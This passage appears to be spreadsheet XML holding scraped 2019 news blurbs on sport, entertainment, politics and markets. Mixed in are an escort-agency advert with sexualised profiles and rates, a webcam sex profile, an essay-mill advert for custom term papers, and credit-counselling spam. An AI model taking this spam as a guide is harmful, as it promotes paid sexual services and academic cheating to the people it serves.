Centre.</t>
  </si>
  <si>
    <t>An amazing 49th season of Sesame Street begins on ABC next week. Celebrity guests this season include Tiffany Haddish, Keegan Michael Key, Blake Lively, Chance the Rapper, Amanda Seyfried, Zoe Kravitz, Questlove, Bill Nye and Solange Knowles! The 49th season of the iconic children’s show Sesame Street will explore a “Learning Through Play” curriculum that models how kids can build school readiness skills as they try out different roles during play. In line with the new curriculum, the season will start with a new special that puts a madcap spin on the familiar pretend-playing different careers. Also new this season is “Abby’s Amazing Adventures,” a recurring animated segment starring Abby Cadabby that shows how girls – and boys, and fairies-in-training! – can take charge of their own journeys. Underscoring the power of guided pretend-play, this season’s episodes illustrate how kids can get more out of playtime with a little bit of planning and gentle guidance. Each week, the Sesame Street gang pretend to be bus drivers, chefs, directors, veterinarians and more, complete with homemade props and scenery made from household objects. Simple career-oriented play is common among children, but when helpful adults empower kids to create their own plans, a game of “restaurant” or “train” can turn into an opportunity to foster both academic and social-emotional skills. “Children learn best through play because they are actively engaged in joyful and meaningful activities that can also be socially interactive and iterative,” said Dr. Rosemarie Truglio, SVP Content and Curriculum, Sesame Workshop. “It is through their play that kids learn to collaborate, self-regulate, communicate, and empathize with peers, motivated by their own interests and curiosities.” By building on a common pattern of pretend play, this year’s curriculum will help children develop critical life skills and imagine new paths for themselves in a safe environment. Whether they’re building a school bus out of cardboard boxes or creating their own newspaper about life on Sesame Street, Elmo, Cookie Monster, Abby Cadabby and friends model how – with a little help! – children can start to see themselves in exciting futures while having fun together. The concept of “Learning through Play” is whimsically interpreted in the season’s new primetime special, with special guests Blake Lively and Amanda Seyfreid. “When You Wish Upon a Pickle” follows the adventure when a wishing machine appears on Sesame Street and the magical pickle inside starts granting wishes! (Elmo finds out what it’s like to run Hooper’s Store, Cookie Monster’s wish for more cookies goes awry, Abby Cadabby teams up with her favourite storybook detective and more, until an unlikely – and grouchy! – hero restores order to the neighboirhood.) Individual episodes throughout the season also celebrate the role-playing theme, with the gang learning about scientific inquiry with Bill Nye, exploring the library with Zoe Kravitz, playing the drums with Questlove, and more. 9am Monday July 29 on ABC</t>
  </si>
  <si>
    <t>Angie Bell says she's proud of her records but she does not want the "narrow lens" of sexuality to define her time in public life.</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190728/p1#a190728p1 Spectral MD, a Dallas-based startup developing an AI-powered burn and wound imaging system, raises $27M in research funding from the US Department of Health (Kyle Wiggers/VentureBeat) Kyle Wiggers / VentureBeat: Spectral MD, a Dallas-based startup developing an AI-powered burn and wound imaging system, raises $27M in research funding from the US Department of Health — Spectral MD, a Dallas, Texas-based startup developing an AI-powered burn and wound imaging system, today announced that it’s secured $27 million … Source: http://www.techmeme.com/190728/p1#a190728p1 The post Spectral MD, a Dallas-based startup developing an AI-powered burn and wound imaging system, raises $27M in research funding from the US Department of Health (Kyle Wiggers/VentureBeat) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Six Sunderland Youngsters to Look out for Next Season ACCRINGTON, ENGLAND – APRIL 03: Denver Hume of Sunderland during the Sky Bet League One match between Accrington Stanley and Sunderland at The Crown Ground on April 3, 2019 in Accrington, United Kingdom. (Photo by Ian Horrocks/Sunderland AFC via Getty Images) After narrowly missing out on promotion last season, fans are hoping for extra quality to be brought in. Sunderland, however, are now operating on a League One budget, even if it is the highest in the league. Players that some fans crave could be out of reach. However, several Sunderland youngsters could reduce the need for new players. The Black Cats have a Premier League academy and with money needing to be carefully watched, now is the time to use products of the academy. Here is a look at some of the Sunderland youngsters who are products of the Academy of Light, plus one player recently brought in who could prove to be a surprise package. Six Sunderland Youngsters to Eye Next Season Denver Hume 22-year-old full-back Denver Hume joined Sunderland as a ten-year-old. He rose through the age groups before competing for the club’s development team. His impressive form saw him given his first-team debut against Wolverhampton Wanderers in the 2017/18 season. Although predominately a left-back, Hume started last season at right-back. He impressed management and fans alike and looked to be establishing himself as a first-team regular. However, a five-month lay off through injury restricted his appearances to just 11 games. Big things are expected from Hume who signed a new contract in April. Should he get a chance in his natural position, the left-back, with an abundance of pace, could have a hugely successful season. Benji Kimpioka The Swedish winger/attacker joined Sunderland in 2016 from IK Sirius. His impressive performances for the Black Cats development side earned him a place in Jack Ross’s first-team squad last season. The 19-year-old made his debut at home to Peterborough United, coming on as a late substitute but still putting in an impressive display. Kimpioka went on to play several more times, most notably in the EFL Trophy. He scored a goal after 123 seconds against Carlisle United. He also scored against fierce rivals Newcastle United. Once described as a wonderkid, Kimpioka is a pacy attacker who can play on either wing or behind the main striker. Still young and still raw, Kimpioka has much to learn. He is currently at odds with the club over a new contract. Having lost top-scorer Josh Maja in January due to having just six months left on his contract, owner Stewart Donald does not want a repeat. The talented youngster would do well to sign a new deal and concentrate on improving. Be that in the Sunderland first team or via a spell on loan. Elliott Embleton The technically gifted midfielder, who shone on loan at Grimsby Town last season, could have a big part to play this coming season. The highly-rated academy product recently signed a new contract with the club for a further two years. Desperate for first-team football, Embleton has been given a chance during pre-season. He has repaid his managers faith with classy and composed performances. He is looking to cement a place in the first-team squad this season. Should he continue to impress, competition in central midfield could get very competitive. A good thing for all concerned. Ethan Robson Robson spent time on loan at Dundee last season having struggled with injuries. The move to Scotland should have been of benefit as it allowed the 22-year-old to gain valuable game time. Robson came through the ranks at his hometown club and has impressed many who have seen him play. Robson believes his time in Scotland has helped him become a better player, telling the Sunderland Echo: “When you come through the academy it’s all nice football, but what I learned in Scotland was that you’ve got to have that snap. You can’t just always think, let him have the ball, you’ve got to make tackles in midfield, you’ve got to get up and down.” At 22, the midfielder now needs to show he is capable of playing regularly for the first team. He has featured so far in pre-season, scoring the opening goal in the Black Cats first game of the summer. Bali Mumba Teenage wonderkid Mumba joined Sunderland at an early age. He rapidly rose through the ranks at the Academy of Light. The youngster began last season in the starting 11. At just 16, he played the full 90 minutes on the opening day against Charlton Athletic. He went on to play the next two games before becoming a bit-part player. Now 17, the talented midfielder still has time on his side; however, he is highly thought of and could have a very bright future. With Jack Ross looking to give more game time to his youngsters, Mumba could benefit. Although a more likely outcome, due to the amount of midfielders Ross has at his disposal, would see Mumba gain experience on loan. Ruben Sammut Sammut is a player who some may not know too well. Where other Sunderland youngsters have been with the club many years, Sammut was one of three youngsters signed earlier this month. He originally had a trial with club last season and impressed enough to earn a permanent deal. Sammut is a product of Chelsea’s academy and, like Lee Cattermole, who recently left the club, is an old fashioned midfield destroyer. He’s not a player who will advance too often into the opponent’s half, but he will protect his defenders. The 21-year-old has featured in pre-season and showed flashes of his talent. Sammut, like several other youngsters, is hoping to make their presence felt this season. Should they continue to improve and impress, Jack Ross could have a very welcome selection headache to deal with. This post Six Sunderland Youngsters to Look out for Next Season appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>A double helping of dessert from Dan Lepard.</t>
  </si>
  <si>
    <t>Dog socks,scarf and hat for sale $5 C &amp; C or add shipping while stocks last. Size Chart for socks • XSmall-Small: up to 11cm • Medium-Large: up to 14cm Size Chart for scarf • XSmall-Small: 15-30cm • Medium-Large: 28-33cm Size Chart for hat • XSmall-Small: 28-33cm • Medium-Large: 43-46cm</t>
  </si>
  <si>
    <t>CLAIRE KING is best known for playing Kim Tate on ITV soap opera Emmerdale, but what some fans of the star may not know is the the health conditions she’s endured outside of acting, both past and present. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>Robert Mueller defended his investigation when House Intelligence Committee Chairman Adam Schiff mentioned President Trump calling it a ‘witch hunt.’ RELATED VIDEO: https://youtu.be/LiwL0v1QBto Former special counsel Robert Mueller told lawmakers during a highly-anticipated public appearance Wednesday that the investigation he supervised revealed a “serious” threat to American democracy from Russian election interference and reinforced his conclusion that he had “not exculpated” President Donald Trump. » Subscribe to USA TODAY: http://bit.ly/1xa3XAh » Watch more on this and other topics from USA TODAY: https://bit.ly/2Vq6Nnq » USA TODAY delivers current local and national news, sports, entertainment, finance, technology, and more through award-winning journalism, photos, videos and VR. source</t>
  </si>
  <si>
    <t>Turns out it is relatively easy to boost your heat's chance of being healthy.</t>
  </si>
  <si>
    <t>Protesters wearing black streamed through Yuen Long, after police refused to grant permission for the march, citing risks of confrontations.</t>
  </si>
  <si>
    <t>Matteo Trentin clinches a fourth Tour de France stage win for Australian team Mitchelton-Scott, but cyclists Tony Martin and Luke Rowe are booted out after an on-road altercation.</t>
  </si>
  <si>
    <t>Welcome to escorts in Drumeldrie KY8, covering the whole area of Fife. We have escorts serving the flats, homes and local hotels in Drumeldrie and the surrounding Fife areas. Drumeldrie Escort Fife Escort Services Drumeldrie Escorts - Girls Who Know How to Fulfill You in Fife Drumeldrie escorts are known in Fife for a wide variety of reasons. The first reason for its popularity is its beauty. The second reason is their skills when it comes to massages. When you are in the area, you will have to walk around a lot if you are a visitor and want to explore the city. After walking around this much, it is not surprising that your legs would be hurting and your body would need some pampering. You can book the services of one of these women and allow them to give you a soothing massage. If you want, you can even enjoy an erotic massage. To achieve your dreams, you should continuously look for various options to realize them. One of the options where you can shine is when there is an important even like annual office day, or your company has organized a special event where a lot of visitors are visiting your office from different branches. To impress your superiors and bosses, you might want to suggest them a great idea of hiring Drumeldrie escorts for the guests visiting in the company event. Your guests will surely be impressed and would feel esteemed when they would meet these stunning escort girls. Hiring the services of these Drumeldrie escort girls will surely turn out to be great since these stunning beauties will cater to the needs of the visitors and make your guests feel outstanding and comfortable at the same time. After the party, you can request for exceptional massage service for these visitors or guests. These escorts have a talent, and they want to be appreciated for it. With these ladies, you can finally be a man that you always wanted to be. These Drumeldrie escorts will bring out several qualities in you which will leave you pleasantly surprised. Age is just in mind and, it doesn’t matter anyway when you are with these women. There are quite a lot of men who feel depressed as they get older since they think that their years of fun are over for good. They believe that with age, they would no longer be able to enjoy the companionship of women at all. However, now you can not just enjoy being with Drumeldrie women, but you can be with sexy, hot, young women who would make you grow wild with desire. Escort Name: Thora Location: Drumeldrie (KY8 6) Nationality: American Spoken Language: English, Thai Age: 21 years old Weight: 64.5kg (142lb) (10st - 2lb) Height: 5 feet 5 inches (165.10cm) Dress Size: XS Shoe Size: 42 Hair Leigh: Medium-length Hair Color: Brunette Eye Color: Blue Breast: Natural Breast Size: DD Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Drumeldrie Outcall: Fife Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Thora Escort Name: Star Location: Drumeldrie (KY8 6) Nationality: Australian Spoken Language: English, Hebrew Age: 21 years old Weight: 58.6kg (129lb) (9st - 3lb) Height: 5 feet 5 inches (165.10cm) Dress Size: M Shoe Size: 38 Hair Leigh: Medium-Length Hair Color: Burnt Orange Eye Color: Red Breast: Natural Breast Size: C Pubic Hair: All Natural Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Drumeldrie Outcall: Fife Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Star Escort Name: Anya Location: Drumeldrie (KY8 6) Nationality: Argentine Spoken Language: English, Czech Age: 21 years old Weight: 57.3kg (126lb) (9st - 0lb) Height: 5 feet 6 inches (167.74cm) Dress Size: S Shoe Size: 36 Hair Leigh: Very Long Hair Color: Black Eye Color: Violet Breast: Silicone Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Drumeldrie Outcall: Fife Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Anya Escort Name: Margot Location: Drumeldrie (KY8 6) Nationality: Swedish Spoken Language: English, Spanish Age: 21 years old Weight: 67.7kg (149lb) (10st - 9lb) Height: 5 feet 10 inches (177.80cm) Dress Size: M Shoe Size: 34 Hair Leigh: Long Hair Color: Bronde Eye Color: Brown Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: Yes Smoking: Occasionally Drinking: No Availability Area: Drumeldrie Outcall: Fife Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Margot Drumeldrie Horny Escort, Drumeldrie Scottish Escort, Drumeldrie Massage Escort, Drumeldrie Agency Escort, Drumeldrie Blonde Escort, Drumeldrie Polish Escort, Drumeldrie Incall Escort, Drumeldrie Indian Escort, Drumeldrie Independent Escort, Drumeldrie Brunette Escort, Drumeldrie Male Escort, Drumeldrie Young Escort, Drumeldrie Walsh Escort, Drumeldrie Ebony Escort, Drumeldrie Busty Escort, Drumeldrie Best Escort, Drumeldrie Bisexual Escort, Drumeldrie Female Escort, Drumeldrie French Escort, Drumeldrie Asian Escort, Drumeldrie Outcall Escort, Drumeldrie Teen Escort, Drumeldrie Gay Escort, Drumeldrie Black Escort, Drumeldrie Mature Escort, Drumeldrie Spanish Escort, Drumeldrie Erotic Escort, Drumeldrie Irish Escort, Drumeldrie Indian Escort, Drumeldrie Brazilian Escort, Drumeldrie Porn Escort, Drumeldrie Chinese Escort, Drumeldrie British Escort, Drumeldrie Cheap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Drumeldrie appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>Jasmine Palace Resort ****** Egypt, Hurghada http://www.friendstravel.sk/detail-zajazdu/jasmine-palace-resort/36129a?es=0&amp;sb=0&amp;ft=jasmine+pal&amp;sm=1 The post Jasmine Palace Resort ***** appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Finding safe beds for women and children brought Annabelle Daniel a very special happiness.</t>
  </si>
  <si>
    <t>Follow the stock markets, breaking news, views and analysis as it happens.</t>
  </si>
  <si>
    <t>UNDERGROUND RIVER IN SABANG/ PUERTO PRINCESA PALAWAN 2019/ TRAVEL TOUR The post UNDERGROUND RIVER IN SABANG/ PUERTO PRINCESA PALAWAN 2019/ TRAVEL TOUR appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>The Battle Over Buy Custom Term Paper and How to Win It You won’t need to rewrite the paper because our writer will write a brand-new paper tedxfsu.org in view of your instructions. You’re fortunate you have come to us to purchase custom term paper. Writing an excellent customized term paper demands a lot of patience and dedication. You desire a term paper fast as you’re approaching deadline. After all, should you not get your term paper delivered on time you are only wasting your money and you’ll get a poor grade for not turning in your assignment in time. Therefore, you save significantly once you purchase custom term paper at our website. If you have to craft an excellent custom term paper, take into consideration the exact option and. For your paper to incorporate the right kind of information, you have to have proper research abilities. You could also state what kind of approach it is you’ll use in your paper for the whole discussion of your topic. Before you sit down to compose your term paper, you need to have many intriguing ideas, a crystal clear comprehension of the matter, and the capability to communicate with your audience in a right way. If you are in need of a customized term paper or a custom made university paper, you should clearly realize what you would like. Buy Custom Term Paper Help! Throughout college, you’ll be requested to work on multiple varieties of term papers. Term papers are extremely subjective in nature. Since they are part of academic assignments, there is always a basic format on how to write a term paper outline. Buying term papers is a challenging and responsible job, which requires not just specific knowledge and skills but a considerable period of time also. You need to be sure you obtain a great deal and not merely some old, cheap, term papers. Term papers usually make an important portion of the whole grade of any class. Our college term papers for sale supply you with a wonderful deal every moment. When you purchase a term paper for college, it is extremely different from just paying the money and receiving the ready item. Although there could be slight differences based on the type of term paper that you’re requested to write, below are the principal methods for writing great term paper outlines. Our term paper writing service permits customers to select the writer they need to work with based on their abilities and assignment requirements. Writing a term paper isn’t a nonsense job and that is exactly why it is even more important that students or scholars seek help and purchase them from good on-line expert term paper writing services. If you’re not completely clear on how best to make sure that you don’t plagiarise, then our customer term paper writing service may be exactly what you want. The Basics of Buy Custom Term Paper If you’re writing out your paper for the very first time, be certain you determine precise means of its undertaking. Think of the significant points that you wish to make in your paper. Try to remember that the outline exists that will help you structure your paper. When you get a research paper from a business, you would like to make sure you’re getting the degree of consumer service you have earned. Writing a research paper is a complicated assignment. It is as important as performing the actual research or experiment itself and can appear to be a very daunting task. Our customized research paper writing company is always prepared to supply you with custom research papers.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Meek Mills debuts powerful new song about police violence Tuesday 23 July 2019 04:03 PM UTC-05 | Tags: credit-counseling from http://creditcounselingconsumer.home.blog/rochester-minnesota-consumer-credit-counseling-service-888-551-1270/ Meek Mill’s BET performance spotlights police violence: Just weeks out of prison, Meek Mill debuted a song that delivered a blistering criticism of the criminal justice system at the BET Awards on Sunday night. Just weeks out of prison, Meek Mill debuted a song that delivered a blistering criticism of the criminal justice system at the BET Awards on Sunday night. https://www.youtube.com/watch?v=890olqm2XKQ https://www.youtube.com/channel/UC_eg9LfpYbwKyuK_arV8IgQ/videos copyright © 2016 Privacy Policy Tags: credit-counseling</t>
  </si>
  <si>
    <t>Shares closed in the red today after the FTSE 100 posted a 2 per cent rise yesterday. Meanwhile, the pound has continued to slide, and has now hit $1.21 as markets price in a no-deal Brexit. In company news, British Gas owner Centrica announced its boss is to step down; oil major BP has posted a profit drop; and High Street bakery chain Greggs has put out another strong set of numbers as its vegan sausage rolls continue to attract attention and customers.</t>
  </si>
  <si>
    <t>My Kinks: Webcam profile: Favourite sex position: all What I do in my amateur show: I like what you want. in the positions you want for a moment of pure pleasure. What I don’t like: Vulgar people, who disrespects me. Ask nicely and your fantasies will be answered. Gallery</t>
  </si>
  <si>
    <t>Source: https://www.wired.com/story/mueller-testimony-election-security Before Mueller’s Testimony, Dems Demand More Election Security Senate Democrats want to remind everyone that US elections are still at risk, and Congress could do more to protect them. Source: https://www.wired.com/story/mueller-testimony-election-security The post Before Mueller’s Testimony, Dems Demand More Election Security appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>M. Engholm</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V I bet you didn’t know there are branded products at dollar stores. Companies simply over produce and have to sell the excess for a bulk price. Resulting in these … source</t>
  </si>
  <si>
    <t>The rule that sidelined Jack de Belin was brought in because the NRL couldn't go three weeks without an off-field incident, court papers claim.</t>
  </si>
  <si>
    <t>Adrian Durham believes it was a ‘disgrace’ that Newcastle United fans called for ‘Bruce out’ the day he was appointed, believing we should be ’embracing one of our own’ in Steve Bruce. This comes from his latest NUFC rant on talkSPORT, telling fans to ‘forget Rafa’ and get behind the players and the manager instead – saying Bruce ‘doesn’t want to hear negativity’ from the stands. Here’s what he’s had to say in his latest rant: "Get behind the players and the manager." "To have #BruceOut on the day he joins the club, I thought it was a disgrace." "Embrace one of your own."@talkSPORTDrive says that Steve Bruce deserves to be given a chance at #NUFC. pic.twitter.com/JiBLiwVhb8— talkSPORT (@talkSPORT) July 24, 2019 My issue with this is the way he asks us to happily accept the fact we’ve swapped a world class manager for a Championship one, claiming ‘no club’ would ever give Rafa Benitez control of transfers (suggesting he had no right to stay on those terms). He claims Rafa’s ‘head was turned’ by ‘Chinese millions’, but I think it’s quite clear that he gave us the entire summer to keep him at the club – yet Mike Ashley failed to compromise and show the ambition required to convince him. I understand parts of Durham’s rant – I think the ‘Bruce out’ talk was poor given he is not the root of the problem here – but I think he’s pretty out of touch with the key issue here. Yes we WANT to get behind our club, our manager and our players, but so many have felt completely and utterly dejected by what we’ve had to deal with over the past 12 years – and this summer has been the final straw for many. Ok, optimism may have remerged for the first time this summer after we signed Joelinton, but in the months that came before that we’ve had: No communication – despite there being SEVERAL key issues that were left unresolved or unanswered for 2 months We’ve lost Rafa Benitez We’ve sold our top scorer (Ayoze Perez) We’ve failed to re-sign our player of the season We had no Benitez replacement lined up, something that derailed our pre-season plans and set back transfer plans We’ve made our first signing of the summer with just two weeks left until the window shuts, creating a huge rush and panic in the 14 days that remain. I hope Bruce does well. I’ll support the players, but I won’t line Mike Ashley’s pockets just because he’s pulled off a £40m signing that acts as a last minute sticky plaster in an attempt to paper over the deep-rooted cracks he’s created. (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>Gig review by Steve Bennett at Just For Laughs, Montreal</t>
  </si>
  <si>
    <t>Li Peng, who was Chinese premier during the bloody 1989 crackdown on protesting students in Tiananmen Square and during the handover of Hong Kong from Britain, has died aged 91.</t>
  </si>
  <si>
    <t>CHRIS RAMSEY has been announced as the second contestant in the new series of Strictly Come Dancing. A comedian for the last 12 year, what is the star’s net worth? Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>Jamie Nye</t>
  </si>
  <si>
    <t>TORONTO — Week 7 of the CFL season comes with one of the best matchups of the year with the best in the East hosting the best of the West. Hamilton and Winnipeg highlight the week as the Tiger-Cats will try to deliver the Bombers their first loss of the season. Both offences are tops in the league in scoring so it could be a shootout on Friday night between the two sides. The Tiger-Cats are coming off their bye week but it’ll be interesting to see if the rest helps with Winnipeg (5-0) coming off a game that saw them give up just one point. The week does start with the rare Thursday night doubleheader. A Grey Cup rematch in Ottawa between the Stampeders and the REDBLACKS. Jonathon Jennings gets the start again for the injured Dominique Davis. Jennings struggled mightily against Winnipeg and it doesn’t get much easier with a strong Calgary defence visiting on Thursday. GET READY FOR WEEK 6 » Total CFL Pick ‘Em | TSN CFL Fantasy » The DailyRoto 2019 CFL Fantasy Guide » Subscribe to the CFL Fantasy Podcast The Stampeders Nick Arbuckle wants to have a bounce back after his worst start since replacing the injured Bo Levi Mitchell. The Stamps still won last week but were tested by the winless Argonauts. The second half of the Thursday night doubleheader has the Edmonton Eskimos hosting those same Argonauts. Toronto is hoping to build on what they saw in the first half in Calgary, which was a one-point game against a decent team. The Eskimos, however, were dumped in Montreal last week and want to keep pace with Winnipeg, who stretched their division lead to two wins last week. The week concludes the same way Week 6 did. The Roughriders and the Lions end off their home and home set after the Riders beat the Lions 38-25 last week. It’s hard to win back to back games but we’re still waiting for Mike Reilly to have a huge night to carry the Lions to victory. We’ll see if taking on a team back to back helps to watch fresh film on an opponent. Calgary at Ottawa Thursday | 7:00 p.m. ET LeoVegas Odds Favourite: Calgary (-240) O/U: 50.5 points Ottawa REDBLACKS quarterback Jonathon Jennings drops back to throw (Freestyle Photography) The Calgary Stampeders got by Toronto last week because the Argos again couldn’t help but get in their own way. The Stamps aren’t the dominant force they have been but they are better than Ottawa going into this game. The REDBLACKS were terrible last week but did play on the road against the best team in the CFL. If the REDBLACKS can get any early momentum and protect the ball, they can beat the Stamps. They’ve consistently played the Stamps strong. This could be Jonathon Jennings last chance to grab the bull by the horns for his career and re-establish himself. The Stamps have to guard against an emotional let down on the road against a struggling team but the Argos surprising them early last week could have helped with that. PICK: CALGARY (75% confidence bonus) Toronto at Edmonton Friday | 9:00 p.m. ET LeoVegas Odds Favourite: Edmonton (-625) O/U: 51.5 points Edmonton Eskimos quarterback Trevor Harris throws a pass against the BC Lions (The Canadian Press) I’d hate to be the Argonauts this week. Not only are you 0-5 with a lack of confidence but you have to go on the road against a good team who just came off a disappointing loss. Any chance the Eskimos have a lapse in motivation should be gone after their 20-10 loss to Montreal. Trevor Harris especially will be looking to bounce back. Toronto played better for a half last week but we saw the reason they’re 0-5 in the second half. Toronto will not go 0-18 but I see 0-6 coming. PICK: EDMONTON (90% confidence bonus) Winnipeg at Hamilton Saturday | 7:00 p.m. ET LeoVegas Odds Favourite: Winnipeg (-143) O/U: 54.5 points Hamilton Tiger-Cats receiver Brandon Banks in between plays (Johany Jutras/CFL.ca) Many already think this will be a Grey Cup preview. The Tiger-Cats are coming off a bye week and should be refreshed though they won’t have linebacker Simoni Lawrence, who begins his two-game suspension. A fresh Ticat offence sounds dangerous, or at least should to the Bombers. Sounds like Adam Bighill is closing in on the lineup. The Bombers offensively are finding new threats and weapons for Matt Nichols. Averages tell us Nichols will have to come back down from his epic performance last week. We should just be ready to be entertained. Taking the fresher team in this one. PICK: HAMILTON (50% confidence bonus) Saskatchewan at BC Saturday | 7:00 p.m. ET LeoVegas Odds Favourite: Saskatchewan (-182) O/U: 52.5 points Saskatchewan Roughriders receiver Shaq Evans flexes during warm-ups (Johany Jutras/CFL.ca) For three quarters the Lions were in it. Then Saskatchewan scored 20 unanswered points and made it look a lot more lopsided. More injuries to the Lions offensive line won’t help matters but they should be able to get a game plan together to slow down Charleston Hughes. But be careful. Too much attention frees up more room for all-star Micah Johnson to get to Reilly. Lions got the run game going and need more of it in this one to control the game as the big plays from the Riders offence piled up. The Riders’ offensive line is also getting juggled due to injury but they get Dariusz Bladek back to fill the hole left by Philip Blake. The Riders defence appears to be coming into their own again and with more playmakers there, it’s going to be tough again for the Lions to get momentum. Although it’s so hard to win both in back to back sets. PICK: SASKATCHEWAN (35% confidence bonus) TSN CFL Fantasy presented by LeoVegas Week 7 Lineup:</t>
  </si>
  <si>
    <t>According to the Chronicle, Newcastle United are staying ‘tight-lipped’ on a potential deal for Nice winger Allan Saint-Maximin. This comes after the Shields Gazette claimed earlier today that we ‘on the verge’ of signing of a new ‘winger’ over the next 48 hours – a report that came just hours after the Frenchman was caught ‘liking’ posts from Joelinton and the club on Instagram last night. Lee Ryder does however reveal in that a £20m deal is there to be done if Newcastle do want to sign the 22-year-old winger, with his new piece also confirming that he’s a player we’ve scouted ‘extensively’ over the past season. Like Joelinton, Allan Saint-Maximin is somebody #nufc watched numerous times last season. A £20million deal is there for Newcastle if they want it.— Lee Ryder (@lee_ryder) July 24, 2019 Ryder’s says the club did nothing to deny rumours of his potential arrival when asked earlier today – a move that is perhaps quite telling after new claims from the Gazette suggested a move for him could go through over the next 48 hours. Saint-Maximin bagged 6 goals and 3 assists in Ligue 1 last season, with him being criticised at times for his final product, yet being praised for his pace, athleticism and incredible dribbling ability – with no player in Europe completing more successful take-ons than him last season!</t>
  </si>
  <si>
    <t>What is on trial here is not just the fate of the condemned men but the judicial system itself and how it administers mercy pleas.</t>
  </si>
  <si>
    <t>Just after midnight Tuesday, crews were called to a fire at a vacant three-storey home at 119 Ottawa St. N. near Roxborough Avenue.</t>
  </si>
  <si>
    <t>New ‘club record’ signing Joelinton has given his first big interview as a Newcastle United player during a chat with NUFC TV. The big man comes across very well, and promises fans he will never be lacking in ‘dedication’ and ‘desire’ on the pitch, with him feeling ‘relaxed’, ‘prepared’ and highly motivated to ‘honour’ the famous number 9 shirt. The £40m-man began with speaking out about his ‘club record’ arrival at St James’ Park, discussing his knowledge of Newcastle United and his first impressions of Steve Bruce – a man he believes could become a ‘father figure’: Record signing Joelinton believes Steve Bruce can be a "father figure" after the Brazilian forward arrived on Tyneside today. Watch the full interview: https://t.co/whjeqekGs1 #NUFC #JoelinToon pic.twitter.com/R9jG815r1a— Newcastle United FC (@NUFC) July 23, 2019 “I know it’s a big responsibility but I’m prepared. “Rest assured, there will be no shortage of desire and dedication to score lots of goals and honour the number nine shirt.” “I know it’s a big club, with massive history. I’ve followed the Premier League since I was little and know about the huge tradition of the club and how passionate the fans are. “I hope to have a great career here.” The Brazilian then responded to questions about the pressure the number 9 shirt can bring, also giving fans an insight into his style of play: “I’m relaxed. I know my quality and I’m prepared. It gives me a lot of motivation to honour this shirt.” “I like enjoying myself on the pitch. I’ll never be lacking in desire and dedication. I bring a lot of emotion. “Physically I’m in great shape. I’ve got good physical strength. I train hard.” Don't miss club record signing Joelinton's exclusive first interview with NUFC TV. Watch it here: https://t.co/QOKIV0nFxg #NUFC pic.twitter.com/3EjpVsOPPI— Newcastle United FC (@NUFC) July 23, 2019 Joelinton also addressed the Roberto Firmino comparisons – another ex-Hoffenheim Brazilian who has been likened to the 22-year-old: “They’ve been making that comparison since I arrived at Hoffenheim. “I like to leave it to one side; it’s never held me back, nor does it affect my mentality. I’m following my own story. Roberto is making his.” The new club record signing then had his say on Newcastle’s fans, claiming he had several members of the Toon Army messaging him after the rumours of his potential arrival reached the press: "The fans haven't stopped writing to me. This affection made me really happy." Watch club record signing Joelinton's first interview with NUFC TV now: https://t.co/QOKIV0nFxg #NUFC #JoelinToon pic.twitter.com/ytxI6Ah45z— Newcastle United FC (@NUFC) July 23, 2019 “When it came out in the press, the fans haven’t stopped writing to me. “This affection made me really happy and I hope to give back to them on the pitch. I hope to bring a lot of joy to the fans.” Behind the scenes on Joelinton's first day on Tyneside…#JoelinToon pic.twitter.com/l7NS9IynA6— Newcastle United FC (@NUFC) July 23, 2019 (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>Media businesses have embraced the consumer watchdog's findings, saying the government's words must be backed by action.</t>
  </si>
  <si>
    <t>Let's continue to expose the truth. This is a neighborhood filled w/families that have small children. West Baltimore is filled with trash thanks to dumping. A problem city officials should have addressed years ago. This is @RepCummings district. @realDonaldTrump More to come pic.twitter.com/gFFszjW490 — Kimberly Klacik (@kimKBaltimore) July 27, 2019 Troubling footage taken by Baltimore […]</t>
  </si>
  <si>
    <t>Kimi Räikkönen has been pleased with Alfa Romeo Racing‘s recent run of results but is adamant that there is still a lot of work to be done in order for that to keep going. The Iceman finished eighth in the last race at Silverstone to go on a streak of three rounds in the points. The Swiss squad aim to close the gap to Renault F1 Team, as they are currently thirteen points behind the French squad in sixth position in the Constructors’ Championship. The most experienced driver on the grid also lies eighth in the drivers standings, thirteen points off seventh place Carlos Sainz Jr. and battling race by race to catch up to the young Spaniard. “I am happy about our recent results but there is a lot more work to do to keep scoring,” Räikkönen said. “Every little bit of progress helps when the battle is so close and, for sure, when it comes to the track we have to extract everything possible from the car. The German Grand Prix this weekend though will mark the twenty-fifth anniversary of the appointment of Team Manager Beat Zehnder, someone who Räikkönen who had worked alongside with back in his rookie Formula 1 season with the team’s predecessors Sauber in 2001. “Hockenheim is a good track to race on and we’ve seen some exciting racing there in the past, so hopefully it will be the case this weekend too. It will be a nice way to celebrate Beat’s career – he’s been a good friend of mine since my debut at Sauber in 2001.”</t>
  </si>
  <si>
    <t>Delivering Brexit, patching up things with Donald Trump, deciding what to do about Iran...Boris will have a lot on his plate.</t>
  </si>
